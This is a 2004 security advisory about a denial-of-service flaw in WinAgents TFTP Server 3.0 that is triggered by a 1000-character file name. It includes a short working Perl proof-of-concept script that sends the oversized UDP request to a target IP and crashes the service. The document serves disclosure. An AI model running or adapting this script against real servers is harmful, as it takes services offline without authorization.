WinAgents TFTP Server Long File Remote Denial Of Service Vulnerability Date: 10 June 2004 Security Alert ID: 1008084 Added by: HH Description: A vulnerability in WinAgents TFTP Server has been reported, allowing a remote user to cause the TFTP service to crash. It is reported that a remote user can request a file with a long filename (1000 characters) to cause the TFTP server to crash Affected: TFTP Server version 3.0. Proof Of Concept: #!/usr/bin/perl # # Remote D.O.S WinAgents TFTP Server ver 3.0 # # Tftp.pl use IO::Socket; $Tftp_Port = "69"; $FileName = "A"x1000; $Tftp_OP = "\x00\x01"; $Tftp_M = "bin"; $Buf = $Tftp_OP . $Tftp_M . $FileName ; if(!($ARGV[0])) print "\nUsage: perl $0 \n" ; exit; print "\nRemote D.O.S WinAgents TFTP Server ver 3.0 PoC\n\n\n"; $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket Error ...\n" ; $ipaddr = inet_aton($ARGV[0]); $portaddr = sockaddr_in($Tftp_Port, $ipaddr); send($socket, $Buf, 0, $portaddr) == length($Buf) or die "Error : Can't send ...\n"; print "Server : $ARGV[0] Is Down ... \n"; Solution: The vendor was notified on June 7 2004, stating a fix will be released shortly. Credits: Ziv Kamir, Global Security Solution IT.